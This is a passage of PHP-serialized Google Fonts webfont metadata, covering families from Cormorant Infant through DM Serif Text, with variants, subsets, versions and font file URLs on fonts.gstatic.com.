Infant\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":10:{s:3:\"300\";s:94:\"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyIU44g9vKiM1sORYSiWeAsLN9951w3_DMrQqcdJrk.ttf\";s:9:\"300italic\";s:97:\"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyKU44g9vKiM1sORYSiWeAsLN997_ItcDEhRoUYNrn_Ig.ttf\";s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyPU44g9vKiM1sORYSiWeAsLN993_Af2DsAXq4.ttf\";s:6:\"italic\";s:93:\"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyJU44g9vKiM1sORYSiWeAsLN997_IV3BkFTq4EPw.ttf\";s:3:\"500\";s:94:\"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyIU44g9vKiM1sORYSiWeAsLN995wQ2_DMrQqcdJrk.ttf\";s:9:\"500italic\";s:97:\"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyKU44g9vKiM1sORYSiWeAsLN997_ItKDAhRoUYNrn_Ig.ttf\";s:3:\"600\";s:94:\"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyIU44g9vKiM1sORYSiWeAsLN995ygx_DMrQqcdJrk.ttf\";s:9:\"600italic\";s:97:\"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyKU44g9vKiM1sORYSiWeAsLN997_ItBDchRoUYNrn_Ig.ttf\";s:3:\"700\";s:94:\"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyIU44g9vKiM1sORYSiWeAsLN9950ww_DMrQqcdJrk.ttf\";s:9:\"700italic\";s:97:\"http://fonts.gstatic.com/s/cormorantinfant/v17/HhyKU44g9vKiM1sORYSiWeAsLN997_ItYDYhRoUYNrn_Ig.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:289;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Cormorant SC\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:85:\"http://fonts.gstatic.com/s/cormorantsc/v17/0ybmGD4kxqXBmOVLG30OGwsmABIU_R3y8DOWGA.ttf\";s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/cormorantsc/v17/0yb5GD4kxqXBmOVLG30OGwserDow9Tbu-Q.ttf\";s:3:\"500\";s:85:\"http://fonts.gstatic.com/s/cormorantsc/v17/0ybmGD4kxqXBmOVLG30OGwsmWBMU_R3y8DOWGA.ttf\";s:3:\"600\";s:85:\"http://fonts.gstatic.com/s/cormorantsc/v17/0ybmGD4kxqXBmOVLG30OGwsmdBQU_R3y8DOWGA.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/cormorantsc/v17/0ybmGD4kxqXBmOVLG30OGwsmEBUU_R3y8DOWGA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:290;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Cormorant Unicase\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:96:\"http://fonts.gstatic.com/s/cormorantunicase/v24/HI_ViZUaILtOqhqgDeXoF_n1_fTGX9N_tucv7Gy0DRzS.ttf\";s:7:\"regular\";s:92:\"http://fonts.gstatic.com/s/cormorantunicase/v24/HI_QiZUaILtOqhqgDeXoF_n1_fTGX-vTnsMnx3C9.ttf\";s:3:\"500\";s:96:\"http://fonts.gstatic.com/s/cormorantunicase/v24/HI_ViZUaILtOqhqgDeXoF_n1_fTGX9Mnt-cv7Gy0DRzS.ttf\";s:3:\"600\";s:96:\"http://fonts.gstatic.com/s/cormorantunicase/v24/HI_ViZUaILtOqhqgDeXoF_n1_fTGX9MLsOcv7Gy0DRzS.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/cormorantunicase/v24/HI_ViZUaILtOqhqgDeXoF_n1_fTGX9Nvsecv7Gy0DRzS.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:291;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Cormorant Upright\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:96:\"http://fonts.gstatic.com/s/cormorantupright/v18/VuJudM3I2Y35poFONtLdafkUCHw1y1N5phDsU9X6RPzQ.ttf\";s:7:\"regular\";s:92:\"http://fonts.gstatic.com/s/cormorantupright/v18/VuJrdM3I2Y35poFONtLdafkUCHw1y2vVjjTkeMnz.ttf\";s:3:\"500\";s:96:\"http://fonts.gstatic.com/s/cormorantupright/v18/VuJudM3I2Y35poFONtLdafkUCHw1y1MhpxDsU9X6RPzQ.ttf\";s:3:\"600\";s:96:\"http://fonts.gstatic.com/s/cormorantupright/v18/VuJudM3I2Y35poFONtLdafkUCHw1y1MNoBDsU9X6RPzQ.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/cormorantupright/v18/VuJudM3I2Y35poFONtLdafkUCHw1y1NpoRDsU9X6RPzQ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:292;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Courgette\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/courgette/v13/wEO_EBrAnc9BLjLQAUkFUfAL3EsHiA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:293;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Courier Prime\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/courierprime/v7/u-450q2lgwslOqpF_6gQ8kELWwZjW-_-tvg.ttf\";s:6:\"italic\";s:85:\"http://fonts.gstatic.com/s/courierprime/v7/u-4n0q2lgwslOqpF_6gQ8kELawRpX837pvjxPA.ttf\";s:3:\"700\";s:86:\"http://fonts.gstatic.com/s/courierprime/v7/u-4k0q2lgwslOqpF_6gQ8kELY7pMf-fVqvHoJXw.ttf\";s:9:\"700italic\";s:89:\"http://fonts.gstatic.com/s/courierprime/v7/u-4i0q2lgwslOqpF_6gQ8kELawRR4-LfrtPtNXyeAg.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:294;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Cousine\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:8:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:6:\"hebrew\";i:5;s:5:\"latin\";i:6;s:9:\"latin-ext\";i:7;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/cousine/v25/d6lIkaiiRdih4SpPzSMlzTbtz9k.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/cousine/v25/d6lKkaiiRdih4SpP_SEvyRTo39l8hw.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/cousine/v25/d6lNkaiiRdih4SpP9Z8K6T7G09BlnmQ.ttf\";s:9:\"700italic\";s:77:\"http://fonts.gstatic.com/s/cousine/v25/d6lPkaiiRdih4SpP_SEXdTvM1_JgjmRpOA.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:295;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Coustard\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/coustard/v16/3XFpErgg3YsZ5fqUU9UPvWXuROTd.ttf\";s:3:\"900\";s:76:\"http://fonts.gstatic.com/s/coustard/v16/3XFuErgg3YsZ5fqUU-2LkEHmb_jU3eRL.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:296;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Covered By Your Grace\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:100:\"http://fonts.gstatic.com/s/coveredbyyourgrace/v15/QGYwz-AZahWOJJI9kykWW9mD6opopoqXSOS0FgItq6bFIg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:297;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Crafty Girls\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/craftygirls/v16/va9B4kXI39VaDdlPJo8N_NvuQR37fF3Wlg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:298;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Creepster\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/creepster/v13/AlZy_zVUqJz4yMrniH4hdXf4XB0Tow.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:299;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Crete Round\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/creteround/v14/55xoey1sJNPjPiv1ZZZrxJ1827zAKnxN.ttf\";s:6:\"italic\";s:81:\"http://fonts.gstatic.com/s/creteround/v14/55xqey1sJNPjPiv1ZZZrxK1-0bjiL2xNhKc.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:300;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Crimson Pro\";s:8:\"variants\";a:16:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:9:\"200italic\";i:9;s:9:\"300italic\";i:10;s:6:\"italic\";i:11;s:9:\"500italic\";i:12;s:9:\"600italic\";i:13;s:9:\"700italic\";i:14;s:9:\"800italic\";i:15;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":16:{s:3:\"200\";s:96:\"http://fonts.gstatic.com/s/crimsonpro/v23/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZTm18OJE_VNWoyQ.ttf\";s:3:\"300\";s:96:\"http://fonts.gstatic.com/s/crimsonpro/v23/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZkG18OJE_VNWoyQ.ttf\";s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/crimsonpro/v23/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZzm18OJE_VNWoyQ.ttf\";s:3:\"500\";s:96:\"http://fonts.gstatic.com/s/crimsonpro/v23/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZ_G18OJE_VNWoyQ.ttf\";s:3:\"600\";s:96:\"http://fonts.gstatic.com/s/crimsonpro/v23/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZEGp8OJE_VNWoyQ.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/crimsonpro/v23/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZKWp8OJE_VNWoyQ.ttf\";s:3:\"800\";s:96:\"http://fonts.gstatic.com/s/crimsonpro/v23/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZTmp8OJE_VNWoyQ.ttf\";s:3:\"900\";s:96:\"http://fonts.gstatic.com/s/crimsonpro/v23/q5uUsoa5M_tv7IihmnkabC5XiXCAlXGks1WZZ2p8OJE_VNWoyQ.ttf\";s:9:\"200italic\";s:98:\"http://fonts.gstatic.com/s/crimsonpro/v23/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi4Ue5s7dtC4yZNE.ttf\";s:9:\"300italic\";s:98:\"http://fonts.gstatic.com/s/crimsonpro/v23/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi7Ke5s7dtC4yZNE.ttf\";s:6:\"italic\";s:98:\"http://fonts.gstatic.com/s/crimsonpro/v23/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi6Ue5s7dtC4yZNE.ttf\";s:9:\"500italic\";s:98:\"http://fonts.gstatic.com/s/crimsonpro/v23/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi6me5s7dtC4yZNE.ttf\";s:9:\"600italic\";s:98:\"http://fonts.gstatic.com/s/crimsonpro/v23/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi5KfJs7dtC4yZNE.ttf\";s:9:\"700italic\";s:98:\"http://fonts.gstatic.com/s/crimsonpro/v23/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi5zfJs7dtC4yZNE.ttf\";s:9:\"800italic\";s:98:\"http://fonts.gstatic.com/s/crimsonpro/v23/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi4UfJs7dtC4yZNE.ttf\";s:9:\"900italic\";s:98:\"http://fonts.gstatic.com/s/crimsonpro/v23/q5uSsoa5M_tv7IihmnkabAReu49Y_Bo-HVKMBi49fJs7dtC4yZNE.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:301;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Crimson Text\";s:8:\"variants\";a:6:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-05-24\";s:5:\"files\";O:8:\"stdClass\":6:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/crimsontext/v19/wlp2gwHKFkZgtmSR3NB0oRJvaAJSA_JN3Q.ttf\";s:6:\"italic\";s:83:\"http://fonts.gstatic.com/s/crimsontext/v19/wlpogwHKFkZgtmSR3NB0oRJfaghWIfdd3ahG.ttf\";s:3:\"600\";s:85:\"http://fonts.gstatic.com/s/crimsontext/v19/wlppgwHKFkZgtmSR3NB0oRJXsCx2C9lR1LFffg.ttf\";s:9:\"600italic\";s:87:\"http://fonts.gstatic.com/s/crimsontext/v19/wlprgwHKFkZgtmSR3NB0oRJfajCOD9NV9rRPfrKu.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/crimsontext/v19/wlppgwHKFkZgtmSR3NB0oRJX1C12C9lR1LFffg.ttf\";s:9:\"700italic\";s:87:\"http://fonts.gstatic.com/s/crimsontext/v19/wlprgwHKFkZgtmSR3NB0oRJfajDqDtNV9rRPfrKu.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:302;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Croissant One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/croissantone/v20/3y9n6bU9bTPg4m8NDy3Kq24UM3pqn5cdJ-4.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:303;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Crushed\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/crushed/v25/U9Mc6dym6WXImTlFT1kfuIqyLzA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:304;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Cuprum\";s:8:\"variants\";a:8:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:6:\"italic\";i:5;s:9:\"500italic\";i:6;s:9:\"600italic\";i:7;s:9:\"700italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":8:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/cuprum/v20/dg45_pLmvrkcOkBnKsOzXyGWTBcmg-X6ZjzSJjQjgnU.ttf\";s:3:\"500\";s:85:\"http://fonts.gstatic.com/s/cuprum/v20/dg45_pLmvrkcOkBnKsOzXyGWTBcmg9f6ZjzSJjQjgnU.ttf\";s:3:\"600\";s:85:\"http://fonts.gstatic.com/s/cuprum/v20/dg45_pLmvrkcOkBnKsOzXyGWTBcmgzv9ZjzSJjQjgnU.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/cuprum/v20/dg45_pLmvrkcOkBnKsOzXyGWTBcmgwL9ZjzSJjQjgnU.ttf\";s:6:\"italic\";s:88:\"http://fonts.gstatic.com/s/cuprum/v20/dg47_pLmvrkcOkBNI_FMh0j91rkhli25jn_YIhYmknUPEA.ttf\";s:9:\"500italic\";s:88:\"http://fonts.gstatic.com/s/cuprum/v20/dg47_pLmvrkcOkBNI_FMh0j91rkhli25vH_YIhYmknUPEA.ttf\";s:9:\"600italic\";s:88:\"http://fonts.gstatic.com/s/cuprum/v20/dg47_pLmvrkcOkBNI_FMh0j91rkhli25UHjYIhYmknUPEA.ttf\";s:9:\"700italic\";s:88:\"http://fonts.gstatic.com/s/cuprum/v20/dg47_pLmvrkcOkBNI_FMh0j91rkhli25aXjYIhYmknUPEA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:305;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Cute Font\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/cutefont/v20/Noaw6Uny2oWPbSHMrY6vmJNVNC9hkw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:306;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Cutive\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/cutive/v17/NaPZcZ_fHOhV3Ip7T_hDoyqlZQ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:307;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Cutive Mono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/cutivemono/v14/m8JWjfRfY7WVjVi2E-K9H5RFRG-K3Mud.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:308;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"DM Mono\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"300\";s:73:\"http://fonts.gstatic.com/s/dmmono/v10/aFTR7PB1QTsUX8KYvrGyIYSnbKX9Rlk.ttf\";s:9:\"300italic\";s:76:\"http://fonts.gstatic.com/s/dmmono/v10/aFTT7PB1QTsUX8KYth-orYataIf4VllXuA.ttf\";s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/dmmono/v10/aFTU7PB1QTsUX8KYhh2aBYyMcKw.ttf\";s:6:\"italic\";s:72:\"http://fonts.gstatic.com/s/dmmono/v10/aFTW7PB1QTsUX8KYth-QAa6JYKzkXw.ttf\";s:3:\"500\";s:73:\"http://fonts.gstatic.com/s/dmmono/v10/aFTR7PB1QTsUX8KYvumzIYSnbKX9Rlk.ttf\";s:9:\"500italic\";s:76:\"http://fonts.gstatic.com/s/dmmono/v10/aFTT7PB1QTsUX8KYth-o9YetaIf4VllXuA.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:309;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"DM Sans\";s:8:\"variants\";a:6:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":6:{s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/dmsans/v11/rP2Hp2ywxg089UriOZSCHBeHFl0.ttf\";s:6:\"italic\";s:72:\"http://fonts.gstatic.com/s/dmsans/v11/rP2Fp2ywxg089UriCZaIGDWCBl0O8Q.ttf\";s:3:\"500\";s:73:\"http://fonts.gstatic.com/s/dmsans/v11/rP2Cp2ywxg089UriAWCrOB-sClQX6Cg.ttf\";s:9:\"500italic\";s:76:\"http://fonts.gstatic.com/s/dmsans/v11/rP2Ap2ywxg089UriCZaw7BymDnYS-Cjk6Q.ttf\";s:3:\"700\";s:73:\"http://fonts.gstatic.com/s/dmsans/v11/rP2Cp2ywxg089UriASitOB-sClQX6Cg.ttf\";s:9:\"700italic\";s:76:\"http://fonts.gstatic.com/s/dmsans/v11/rP2Ap2ywxg089UriCZawpBqmDnYS-Cjk6Q.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:310;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"DM Serif Display\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/dmserifdisplay/v10/-nFnOHM81r4j6k0gjAW3mujVU2B2K_d709jy92k.ttf\";s:6:\"italic\";s:92:\"http://fonts.gstatic.com/s/dmserifdisplay/v10/-nFhOHM81r4j6k0gjAW3mujVU2B2G_Vx1_r352np3Q.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:311;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"DM Serif Text\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/dmseriftext/v10/rnCu-xZa_krGokauCeNq1wWyafOPXHIJErY.ttf\";s:6:\"italic\";s:85:\"http://fonts.gstatic.com/s/dmseriftext/v10/rnCw-xZa_krGokauCeNq1wWyWfGFWFAMArZKqQ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:312;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Damion\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/damion/v14/hv-XlzJ3KEUe_YZUbWY3MTFgVg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:313;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Dancing 